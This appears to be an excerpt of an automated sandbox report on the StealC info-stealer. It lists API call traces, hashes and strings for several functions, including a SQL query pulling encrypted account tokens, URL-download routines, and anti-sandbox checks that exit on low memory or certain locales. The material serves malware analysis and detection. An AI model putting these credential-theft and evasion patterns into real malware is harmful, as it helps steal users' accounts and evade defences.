Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 1440504306-1079375795
Opcode ID: a591192ca9d3836a554972a5500f4fe45fc4737e1f9495fd5f96d8f77445e6de
Instruction ID: b5e20980da08a92d857e63bff4df80a062e6addc460d786a05629deac7820924
Opcode Fuzzy Hash: a591192ca9d3836a554972a5500f4fe45fc4737e1f9495fd5f96d8f77445e6de
Instruction Fuzzy Hash: 01B11271950108EBEF05FBA0DD9AEEE7378AF54300F40456AF506A6191EF3C6A49CB72

Function 00774FB0 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00774FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00774FD1
InternetOpenA.WININET(00790DDF,00000000,00000000,00000000,00000000), ref: 00774FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00775011
InternetReadFile.WININET(00785EDB,?,00000400,00000000), ref: 00775041
memcpy.MSVCRT(00000000,?,00000001), ref: 0077508A
InternetCloseHandle.WININET(00785EDB), ref: 007750B9
InternetCloseHandle.WININET(?), ref: 007750C6

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
String ID:
API String ID: 1008454911-0
Opcode ID: f6f70fed661ead36abc1df6e6bf9aa5372dd7e7f08bccdaa4bf3bc876d163d15
Instruction ID: c953efe399eee535d2ef1da33b843862ec7609296ad2825a2586c91cacc243d4
Opcode Fuzzy Hash: f6f70fed661ead36abc1df6e6bf9aa5372dd7e7f08bccdaa4bf3bc876d163d15
Instruction Fuzzy Hash: 703128B4A44218ABDB20CF54DD85BDCB7B4FB48704F1081D9F609A7280DBB46AC5DF99

Function 007869F0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1BA0), ref: 007898A1
Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1CA8), ref: 007898BA
Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1BD0), ref: 007898D2
Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1C60), ref: 007898EA
Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1D38), ref: 00789903
Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1600), ref: 0078991B
Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CEACC8), ref: 00789933
Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CEAF08), ref: 0078994C
Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1BE8), ref: 00789964
Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1C30), ref: 0078997C
Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1CC0), ref: 00789995
Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1A80), ref: 007899AD
Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CEAE68), ref: 007899C5
Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1CF0), ref: 007899DE

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 007711D0: ExitProcess.KERNEL32 ref: 00771211

Part of subcall function 00771160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00786A17,00790AEF), ref: 0077116A
Part of subcall function 00771160: ExitProcess.KERNEL32 ref: 0077117E

Part of subcall function 00771110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00786A1C), ref: 0077112B
Part of subcall function 00771110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00786A1C), ref: 00771132
Part of subcall function 00771110: ExitProcess.KERNEL32 ref: 00771143

Part of subcall function 00771220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0077123E
Part of subcall function 00771220: __aulldiv.LIBCMT ref: 00771258
Part of subcall function 00771220: __aulldiv.LIBCMT ref: 00771266
Part of subcall function 00771220: ExitProcess.KERNEL32 ref: 00771294

Part of subcall function 00786770: GetUserDefaultLangID.KERNEL32(?,?,00786A26,00790AEF), ref: 00786774

GetUserDefaultLCID.KERNEL32 ref: 00786A26

Part of subcall function 00771190: ExitProcess.KERNEL32 ref: 007711C6

Part of subcall function 00787850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007711B7), ref: 00787880
Part of subcall function 00787850: HeapAlloc.KERNEL32(00000000,?,?,?,007711B7), ref: 00787887
Part of subcall function 00787850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0078789F

Part of subcall function 007878E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00786A2B), ref: 00787910
Part of subcall function 007878E0: HeapAlloc.KERNEL32(00000000,?,?,?,00786A2B), ref: 00787917
Part of subcall function 007878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0078792F

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00CF1620,?,0079110C,?,00000000,?,00791110,?,00000000,00790AEF), ref: 00786ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00786AE8
CloseHandle.KERNEL32(00000000), ref: 00786AF9
Sleep.KERNEL32(00001770), ref: 00786B04
CloseHandle.KERNEL32(?,00000000,?,00CF1620,?,0079110C,?,00000000,?,00791110,?,00000000,00790AEF), ref: 00786B1A
ExitProcess.KERNEL32 ref: 00786B22

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 3511611419-0
Opcode ID: 131504898ecc1e088849ad8fb6551cb04f12ece03230755857d701cbec1fe6d9
Instruction ID: 24d9fe55fa50293eeb556da589d1a44ec2a988ce7e11c609e10ebdc1352fbc2c
Opcode Fuzzy Hash: 131504898ecc1e088849ad8fb6551cb04f12ece03230755857d701cbec1fe6d9
Instruction Fuzzy Hash: 02312A71994208FAEB05FBE0DC5EBEE7778AF04340F508529F212A6192DF7C6905D7A2

Function 007883DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00788426
wsprintfA.USER32 ref: 00788459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0078847B
RegCloseKey.ADVAPI32(00000000), ref: 0078848C
RegCloseKey.ADVAPI32(00000000), ref: 00788499

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

RegQueryValueExA.KERNEL32(00000000,00CFF888,00000000,000F003F,?,00000400), ref: 007884EC
lstrlenA.KERNEL32(?), ref: 00788501
RegQueryValueExA.KERNEL32(00000000,00CFF948,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00790B34), ref: 00788599
RegCloseKey.KERNEL32(00000000), ref: 00788608
RegCloseKey.ADVAPI32(00000000), ref: 0078861A

Strings

%s\%s, xrefs: 0078844D

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 4209f837a2976c9ca1174a9808895b0821d690e342a9e256db2b7fb2679ca1cd
Instruction ID: 6416b2f3e6c5539c366a8e975dd12da7ffedf0fd90d62958629b1a938805f875
Opcode Fuzzy Hash: 4209f837a2976c9ca1174a9808895b0821d690e342a9e256db2b7fb2679ca1cd
Instruction Fuzzy Hash: A92139B1A54218ABDB64DB54DC85FE9B3B8FB48710F00C2D8E609A6140DF75AA81CFE5

Function 007747B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 007747EA
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774801
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774818
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00774839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00774849

Strings

<, xrefs: 007747C9

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: ad58256cef64b92ed31f76b56dd340a43218585675805fc58c5cd6d267842c84
Instruction ID: b7c227214048d9756ea33c2e9c5375d6e4dac98199556f4b892a391a1499a689
Opcode Fuzzy Hash: ad58256cef64b92ed31f76b56dd340a43218585675805fc58c5cd6d267842c84
Instruction Fuzzy Hash: 0A21E8B1D00209ABDF14EFA4E949ADD7B74FB45320F208225F925A72D0EB746A15CF92

Function 00787690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 007876A4
HeapAlloc.KERNEL32(00000000), ref: 007876AB
RegOpenKeyExA.KERNEL32(80000002,00CF8288,00000000,00020119,00000000), ref: 007876DD
RegQueryValueExA.KERNEL32(00000000,00CFF798,00000000,00000000,?,000000FF), ref: 007876FE
RegCloseKey.ADVAPI32(00000000), ref: 00787708

Strings

Windows 11, xrefs: 007876BD

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: f3c1c8892f0821982c9e23d570d5c97c3c33c215ed3297f075375657e9b559dd
Instruction ID: ca347bfbbb7a484c88732f71913c4c749924aeaa86113a474daa7ecc68e3c5c1
Opcode Fuzzy Hash: f3c1c8892f0821982c9e23d570d5c97c3c33c215ed3297f075375657e9b559dd
Instruction Fuzzy Hash: 6101A2B4A58304BFDB00EBE0DE4DF6DB7B8EB48711F104154FA05D7290EA749900DB51

Function 00787720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00787734
HeapAlloc.KERNEL32(00000000), ref: 0078773B
RegOpenKeyExA.KERNEL32(80000002,00CF8288,00000000,00020119,007876B9), ref: 0078775B
RegQueryValueExA.KERNEL32(007876B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0078777A
RegCloseKey.ADVAPI32(007876B9), ref: 00787784

Strings

CurrentBuildNumber, xrefs: 00787771

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 5cd4e3b30f863feee3ba0ba317709338cc48bc7cea9d1202ede05c50aad8501a
Instruction ID: a961f138e8efd7fa2de35f5183dee89a857e0a5b609f81f3ac538b79d980b141
Opcode Fuzzy Hash: 5cd4e3b30f863feee3ba0ba317709338cc48bc7cea9d1202ede05c50aad8501a
Instruction Fuzzy Hash: A50167B5E54308BFDB00DBE0DD49FAEB7B8EB44710F104154FA05A7281DA745500DB91

Function 007840B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 007840D5
RegOpenKeyExA.KERNEL32(80000001,00D000A0,00000000,00020119,?), ref: 007840F4
RegQueryValueExA.ADVAPI32(?,00CFFB58,00000000,00000000,00000000,000000FF), ref: 00784118
RegCloseKey.ADVAPI32(?), ref: 00784122
lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00784147
lstrcatA.KERNEL32(?,00CFFC48), ref: 0078415B

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
